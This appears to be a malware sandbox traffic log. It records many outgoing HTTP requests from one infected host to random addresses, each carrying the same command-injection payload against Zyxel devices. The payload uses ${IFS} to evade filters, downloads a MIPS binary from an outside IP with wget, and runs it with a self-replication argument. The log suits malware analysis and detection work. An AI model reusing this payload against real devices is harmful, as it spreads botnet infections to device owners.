                                                Jan 12, 2024 18:16:24.474616051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4631192.168.2.234815478.76.135.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474662066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4632192.168.2.235192447.105.88.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474698067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4633192.168.2.2348586216.2.3.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474747896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4634192.168.2.234138485.177.118.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474802971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4635192.168.2.2351088112.93.185.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474824905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4636192.168.2.2332976197.195.254.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474867105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4637192.168.2.2343336192.107.186.55443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474910021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4638192.168.2.2356636129.232.61.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474950075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4639192.168.2.2359886209.232.0.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.474992990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4640192.168.2.2333924216.209.48.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475032091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4641192.168.2.2352850138.143.142.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475080013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4642192.168.2.234411631.94.68.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475111961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4643192.168.2.2338964161.227.103.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475142002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4644192.168.2.2341852207.52.140.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475169897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4645192.168.2.235743443.54.56.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475224972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4646192.168.2.2354868144.232.152.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475244999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4647192.168.2.2334976156.120.179.46443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475295067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4648192.168.2.2352810144.226.236.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475336075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4649192.168.2.2354530191.211.80.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475383043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4650192.168.2.234877838.25.193.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475440025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4651192.168.2.2348872174.188.7.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475470066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4652192.168.2.2339024113.99.2.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475502968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4653192.168.2.2345700120.116.134.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475569963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4654192.168.2.234370875.236.104.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475621939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4655192.168.2.2336252149.217.202.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475651979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4656192.168.2.23437461.250.163.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475703955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4657192.168.2.2346522106.254.41.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475753069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4658192.168.2.233391073.79.244.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475804090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4659192.168.2.2356108153.46.253.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475841045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4660192.168.2.233681643.55.142.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475879908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4661192.168.2.2355562175.12.57.43443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475919008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4662192.168.2.235059868.132.69.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.475969076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4663192.168.2.234714424.188.173.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476016045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4664192.168.2.234171823.42.150.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476069927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4665192.168.2.236034662.99.238.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476104021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4666192.168.2.2341500167.87.228.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476147890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4667192.168.2.2332918171.80.187.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476187944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4668192.168.2.2353924219.81.109.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476205111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4669192.168.2.235826224.181.119.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476260900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4670192.168.2.234964652.162.208.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476280928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4671192.168.2.233418097.134.107.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476331949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4672192.168.2.236011269.184.25.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476361036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4673192.168.2.2354332101.73.97.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476401091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4674192.168.2.236022024.245.132.42443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476444006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4675192.168.2.235786874.218.188.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476490974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4676192.168.2.2342244178.49.77.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476536036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4677192.168.2.2347050156.127.228.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476567030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4678192.168.2.235164263.253.68.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476588964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4679192.168.2.23601004.15.45.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476627111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4680192.168.2.233571617.234.174.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476680040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4681192.168.2.235699613.176.25.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476721048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4682192.168.2.2358436100.212.159.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476769924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4683192.168.2.2360986212.191.182.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476824045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4684192.168.2.2351138201.168.255.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476851940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4685192.168.2.2358128117.89.132.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476881027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4686192.168.2.235103869.204.174.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476907015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4687192.168.2.2349702129.160.159.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476944923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4688192.168.2.2351452143.29.153.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.476977110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4689192.168.2.2339960148.219.169.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477016926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4690192.168.2.2342474172.186.59.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477050066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4691192.168.2.2346482169.95.127.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477082968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4692192.168.2.2356548151.109.56.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:24.477113008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4693192.168.2.2347104166.133.19.246443
                                                TimestampBytes transferredDirectionData
